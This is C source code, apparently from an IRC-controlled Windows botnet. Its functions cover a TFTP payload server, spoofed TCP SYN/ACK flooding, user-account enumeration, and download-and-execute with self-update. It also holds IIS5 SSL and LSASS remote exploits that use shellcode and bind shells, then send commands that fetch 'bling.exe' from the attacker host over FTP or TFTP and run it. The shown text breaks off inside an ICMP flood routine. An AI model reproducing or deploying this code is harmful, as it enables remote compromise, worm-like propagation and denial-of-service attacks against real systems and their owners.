DWORD WINAPI tftpserver(LPVOID param) { FILE *fp; char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18]; int err=1; TFTP tftp = *((TFTP *)param); TFTP *tftps = (TFTP *)param; tftps->gotinfo = TRUE; tftp.threads++; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) { Sleep(400); sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); clearthread(tftp.threadnum); ExitThread(0); } threads[tftp.threadnum].sock=ssock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)tftp.port); ssin.sin_addr.s_addr = INADDR_ANY; if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) { Sleep(5000); tftp.threads--; return tftpserver(param); } if ((fp=fopen(tftp.filename, "rb")) == NULL) { Sleep(400); sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename); irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); clearthread(tftp.threadnum); ExitThread(0); } while(err>0 && tftps->gotinfo && fp) { TIMEVAL timeout; timeout.tv_sec=5; timeout.tv_usec=5000; fd_set fd; FD_ZERO(&fd); FD_SET(ssock,&fd); memset(buffer,0,sizeof(buffer)); if(fselect(0,&fd,NULL,NULL,&timeout) > 0) { SOCKADDR_IN csin; int csin_len=sizeof(csin); char f_buffer[BLOCKSIZE+4]=""; err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len); sprintf(IP,finet_ntoa(csin.sin_addr)); // parse buffer if(buffer[0]==0 && buffer[1]==1) { //RRQ char *tmprequest=buffer,*tmptype=buffer; tmprequest+=2; //skip the opcode tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) { fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len); // for loop to add a \0 to the end of the requestname sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname); addlog(buffer); } else { // good rrq packet send first data packet fseek(fp, 0, SEEK_SET); f_buffer[0]=0; f_buffer[1]=3; // DATA f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK # err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len); sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); } } else if(buffer[0]==0 && buffer[1]==4) { // ACK // send next packet unsigned int blocks; BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK # f_buffer[0]=0; f_buffer[1]=3; // DATA if (b2==255) { // DATA BLOCK # f_buffer[2]=++b1; f_buffer[3]=b2=0; } else { f_buffer[2]=b1; f_buffer[3]=++b2; } blocks=(b1 * 256) + b2 - 1; // remember to subtract 1 as the ACK block # is 1 more than the actual file block # fseek(fp, blocks * BLOCKSIZE, SEEK_SET); err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len); if (err==0) { sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); } } else { // we dont support any other commands fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len); } } else continue; } // check for ack, then msg irc on transfer complete fclosesocket(ssock); fclose(fp); tftp.threads--; if(tftps->gotinfo == FALSE) { clearthread(tftp.threadnum); ExitThread(0); } Sleep(1000); return tftpserver(param); }
DWORD WINAPI TcpFloodThread(LPVOID param) { TCPFLOOD tcpflood = *((TCPFLOOD *)param); TCPFLOOD *tcpfloods = (TCPFLOOD *)param; tcpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; srand(GetTickCount()); SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } if (finet_addr(tcpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[TCP]: Invalid target IP."); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) { ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock)))); ipHeader.destIP=ssin.sin_addr.s_addr; ((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); tcpHeader.sport=fhtons((unsigned short)(rand()%1025)); tcpHeader.seq=fhtonl(0x12345678); if (strstr(tcpflood.type,"syn")) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strstr(tcpflood.type,"ack")) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strstr(tcpflood.type,"random")) { tcpHeader.ack_seq=rand()%3; ((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK)); } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(512); tcpHeader.urg_ptr=0; tcpHeader.checksum=0; psdHeader.saddr=ipHeader.sourceIP; psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); }
NET_API_STATUS UserInfo(char *ServerName, char *Username, SOCKET sock, char *chan, BOOL notice) { char buffer[IRCLINE], *user_priv; LPUSER_INFO_11 pBuf = NULL; DWORD dwLevel = 11; LPWSTR wServerName = (LPWSTR)AsWideString(ServerName); LPWSTR wUsername = (LPWSTR)AsWideString(Username); NET_API_STATUS nStatus = fNetUserGetInfo(wServerName,wUsername,dwLevel,(LPBYTE *)&pBuf); if (nStatus == NERR_Success) { if (pBuf != NULL) { sprintf(buffer,"Account: %S",pBuf->usri11_name); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Full Name: %S",pBuf->usri11_full_name); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"User Comment: %S",pBuf->usri11_usr_comment); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Comment: %S",pBuf->usri11_comment); irc_privmsg(sock,chan,buffer,notice,TRUE); switch(pBuf->usri11_priv) { case USER_PRIV_GUEST: user_priv = TEXT("Guest"); break; case USER_PRIV_USER: user_priv = TEXT("User"); break; case USER_PRIV_ADMIN: user_priv = TEXT("Administrator"); break; default: user_priv = TEXT("Unknown"); break; } sprintf(buffer,"Privilege Level: %s",user_priv); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Auth Flags: %d",pBuf->usri11_auth_flags); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Home Directory: %S",pBuf->usri11_home_dir); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Parameters: %S",pBuf->usri11_parms); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Password Age: %d",pBuf->usri11_password_age); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Bad Password Count: %d",pBuf->usri11_bad_pw_count); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Number of Logins: %d",pBuf->usri11_num_logons); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Last Logon: %d",pBuf->usri11_last_logon); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Last Logoff: %d",pBuf->usri11_last_logoff); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Logon Server: %S",pBuf->usri11_logon_server); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Workstations: %S",pBuf->usri11_workstations); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Country Code: %d",pBuf->usri11_country_code); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"User's Language: %d",pBuf->usri11_code_page); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Max. Storage: %d",pBuf->usri11_max_storage); irc_privmsg(sock,chan,buffer,notice,TRUE); sprintf(buffer,"Units Per Week: %d",pBuf->usri11_units_per_week); irc_privmsg(sock,chan,buffer,notice,TRUE); } } else { sprintf(buffer,"-\x03\x34\2net\2\x03- user info error <%ld>",nStatus); irc_privmsg(sock,chan,buffer,notice); } if (pBuf != NULL) fNetApiBufferFree(pBuf); return (nStatus); }
// function for downloading files/updating DWORD WINAPI DownloadThread(LPVOID param) { char buffer[IRCLINE]; DWORD r, d, start, total, speed; DOWNLOAD dl = *((DOWNLOAD *)param); DOWNLOAD *dls = (DOWNLOAD *)param; dls->gotinfo = TRUE; HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0); if (fh != NULL) { // open the file HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); // make sure that our file handle is valid if (f < (HANDLE)1) { sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest); if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); clearthread(dl.threadnum); ExitThread(0);; } total = 0; start = GetTickCount(); char *fileTotBuff=(char *)malloc(512000); //FIX ME: Only checks first 500 kb do { memset(buffer, 0, sizeof(buffer)); fInternetReadFile(fh, buffer, sizeof(buffer), &r); if (dl.encrypted) Xorbuff(buffer,r); WriteFile(f, buffer, r, &d, NULL); if ((total) < 512000) { //We have free bytes... //512000-total unsigned int bytestocopy; bytestocopy=512000-total; if (bytestocopy>r) bytestocopy=r; memcpy(&fileTotBuff[total],buffer,bytestocopy); } total+=r; if (dl.filelen) if (total>dl.filelen) break; //er, we have a problem... filesize is too big. if (dl.update != 1) sprintf(threads[dl.threadnum].name, "[Download]: Download: %s (%dKB transferred).", dl.url, total / 1024); else sprintf(threads[dl.threadnum].name, "[Download]: Update: %s (%dKB transferred).", dl.url, total / 1024); } while (r > 0); BOOL goodfile=TRUE; if (dl.filelen) { if (total!=dl.filelen) { goodfile=FALSE; sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen); irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); } } speed = total / (((GetTickCount() - start) / 1000) + 1); CloseHandle(f); /* if (dl.expectedcrc) { unsigned long crc,crclength; sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total); crclength=total; if (crclength>512000) crclength=512000; crc=crc32(fileTotBuff,crclength); if (crc!=dl.expectedcrc) { goodfile=FALSE; irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice); } } */ free(fileTotBuff); if (dl.expectedcrc) { unsigned long crc=crc32f(dl.dest); if (crc!=dl.expectedcrc) { goodfile=FALSE; sprintf(buffer,"[DOWNLOAD]: CRC Fallito (%d != %d).", crc, dl.expectedcrc); irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } } if (goodfile==FALSE) goto badfile; //download isn't an update if (dl.update != 1) { sprintf(buffer, "[DOWNLOAD]: D0S Downloaded %.1f KB in %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); if (dl.run == 1) { fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW); if (!dl.silent) { sprintf(buffer,"[DOWNLOAD]: Apro Il File : %s.",dl.dest); irc_privmsg(dl.sock,dl.chan,buffer,dl.notice); addlog(buffer); } } // download is an update } else { sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB in %s @ %.1fKB/sec. Updato.", total / 1024.0, dl.dest, speed / 1024.0); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&pinfo, 0, sizeof(pinfo)); memset(&sinfo, 0, sizeof(sinfo)); sinfo.lpTitle = ""; sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESHOWWINDOW; sinfo.wShowWindow = SW_HIDE; if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) { fWSACleanup(); uninstall(); ExitProcess(EXIT_SUCCESS); } else { sprintf(buffer,"[DOWNLOAD]: Update Fallito: Errore Nell'Apertura Del File: %s.",dl.dest); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } } } else { sprintf(buffer,"[DOWNLOAD]: Link o DnS Non Trovato SUKKIAMELO!: %s.",dl.url); if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); addlog(buffer); } badfile: fInternetCloseHandle(fh); clearthread(dl.threadnum); ExitThread(0); }
DWORD WINAPI visit(LPVOID param) { HINTERNET ch = 0, req = 0; const char *accept = "*/*"; char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE]; vs visit = *((vs *)param); vs *vsp = (vs *)param; vsp->gotinfo = TRUE; // zero out string varaiables memset(vhost, 0, sizeof(vhost)); memset(vuser, 0, sizeof(vuser)); memset(vpass, 0, sizeof(vpass)); memset(vpath, 0, sizeof(vpath)); // zero out url structure and set options URL_COMPONENTS url; memset(&url, 0, sizeof(url)); url.dwStructSize = sizeof(url); url.dwHostNameLength = 1; url.dwUserNameLength = 1; url.dwPasswordLength = 1; url.dwUrlPathLength = 1; do { // crack the url (break it into its main parts) if (!fInternetCrackUrl(visit.host, strlen(visit.host), 0, &url)) { sprintf(sendbuf,"[VISIT]: Invalid URL."); break; } // copy url parts into variables if (url.dwHostNameLength > 0) strncpy(vhost, url.lpszHostName, url.dwHostNameLength); int vport = url.nPort; if (url.dwUserNameLength > 0) strncpy(vuser, url.lpszUserName, url.dwUserNameLength); if (url.dwPasswordLength > 0) strncpy(vpass, url.lpszPassword, url.dwPasswordLength); if (url.dwUrlPathLength > 0) strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength); ch = fInternetConnect(ih, vhost,(unsigned short)vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0); if (ch == NULL) { sprintf(sendbuf,"[VISIT]: Could not open a connection."); break; } req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.referer, &accept, INTERNET_FLAG_NO_UI, 0); if (req == NULL) { sprintf(sendbuf,"[VISIT]: Failed to connect to HTTP server."); break; } if (fHttpSendRequest(req, NULL, 0, NULL, 0)) sprintf(sendbuf,"[VISIT]: URL visited."); else sprintf(sendbuf,"[VISIT]: Failed to get requested URL from HTTP server."); } while(0); // always false, so this never loops, only helps make error handling easier if (!visit.silent) irc_privmsg(visit.sock, visit.chan, sendbuf, visit.notice); addlog(sendbuf); fInternetCloseHandle(ch); fInternetCloseHandle(req); clearthread(visit.threadnum); ExitThread(0); }
BOOL IIS5SSL(EXINFO exinfo) { char buffer[IRCLINE]; char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00"; unsigned long XOR=0xffffffff; unsigned long offsets[] = { 0x6741a1cd, // Win2K SP0 0x6741a199, // Win2K SP1 0x6741a426, // Win2K SP2 0x67419e1d, // Win2K SP3 0x67419ce8, // Win2K SP4 0x0ffb7de9, // WinXP SP0 0x0ffb832f // WinXP SP1 }; BOOL bRet = FALSE; unsigned char *badbuffer=(unsigned char*)malloc(347); memset(badbuffer, 0, 347); unsigned char *p=badbuffer; memcpy(p, request, sizeof(request)); p+=sizeof(request)-1; strcat((char*)p, jumper); strcat((char*)p, bind_shell_code); SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; // FIX ME: since i didnt found a way to determine the remote OS, i // placed this all together in a loop. this aint the best way // i'm sure about that for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) { memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { offsets[i]^=XOR; strncat((char*)p, (char*)&offsets[i], 4); strcat((char*)p, shellcode); if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) { Sleep(1000); fclosesocket(sSock); memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(1981); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) { char cmd_buff[400]; #ifndef NO_TFTPD _snprintf(cmd_buff, sizeof (cmd_buff), "tftp -i %s get %s\r\n", GetIP(exinfo.sock),filename, filename); #endif #ifndef NO_FTPD _snprintf(cmd_buff, sizeof (cmd_buff), "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT); #endif if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) { Sleep(500); if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) { fclosesocket(sSock); bRet = TRUE; _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); break; } } } } } fclosesocket(sSock); } } return (bRet); }
BOOL lsass2(EXINFO exinfo) { int i, targetx, len, targetxOS; char hostipc[40]; char hostipc2[40*2]; char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(reqx4)+20]; char screq[BUFSIZE+sizeof(reqx7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4"; char strBuffer[BUFSIZE]; char buffer[IRCLINE], cmd_buff[400]; char smblen; char unclen; unsigned short port; SOCKET sSocket, bSocket; SOCKADDR_IN ssin, bsin; targetxOS = FpHost(exinfo.ip, FP_RPC); if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT)) return FALSE; if (targetxOS == OS_WINXP) targetx = 0; else if (rand() % 10) targetx = 1; else targetx = 2; _snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0; } memcpy(req4u, reqx4, sizeof(reqx4)-1); memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2); memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9); smblen = 52+(char)strlen(hostipc)*2; memcpy(req4u+3, &smblen, 1); unclen = 9 + (char)strlen(hostipc)*2; memcpy(req4u+45, &unclen, 1); port = fhtons(LSASS_BSPORT)^(USHORT)0x9999; memcpy(&bindshell[176], &port, 2); if ((targetx == 1) || (targetx == 2)) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "\x3c\x12\x15\x75", 4); memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4); memcpy(&buf[2036], &bindshell, strlen(bindshell)); memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr memcpy(&buf[2856], &bindshell, strlen(bindshell)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2); } else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, bindshell, strlen(bindshell)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr; } memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500); if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR) return FALSE; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) { fclosesocket(sSocket); return FALSE; } if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if ((targetx == 1) || (targetx == 2)) { memcpy(screq2k, reqx8, sizeof(reqx8)-1); memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2); memcpy(screq2k2, reqx9, sizeof(reqx9)-1); memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348); memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1); if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } } else { memcpy(screq, reqx7, sizeof(reqx7)-1); memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE); memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16); screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0; if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } } len = frecv(sSocket, recvbuf, 1600, 0); if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } memset(&bsin, 0, sizeof(bsin)); bsin.sin_family = AF_INET; bsin.sin_port = fhtons(LSASS_BSPORT); bsin.sin_addr.s_addr = finet_addr(exinfo.ip); if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) { fclosesocket(sSocket); fclosesocket(bSocket); return FALSE; } if (frecv(bSocket, recvbuf, 1600, 0) > 0) { Sleep(500); _snprintf(cmd_buff, sizeof(cmd_buff), // "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename); "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT); if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) { fclosesocket(sSocket); fclosesocket(bSocket); return FALSE; } fclosesocket(sSocket); fclosesocket(bSocket); _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; } else return FALSE; }
DWORD WINAPI ICMPFloodThread(LPVOID param) { ICMPFLOOD icmpflood = *((ICMPFLOOD *)param); ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param; icmpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; static ECHOREQUEST echo_req; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } if (finet_addr(icmpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[ICMP]: Invalid target IP."); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(icmpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) { echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long)); 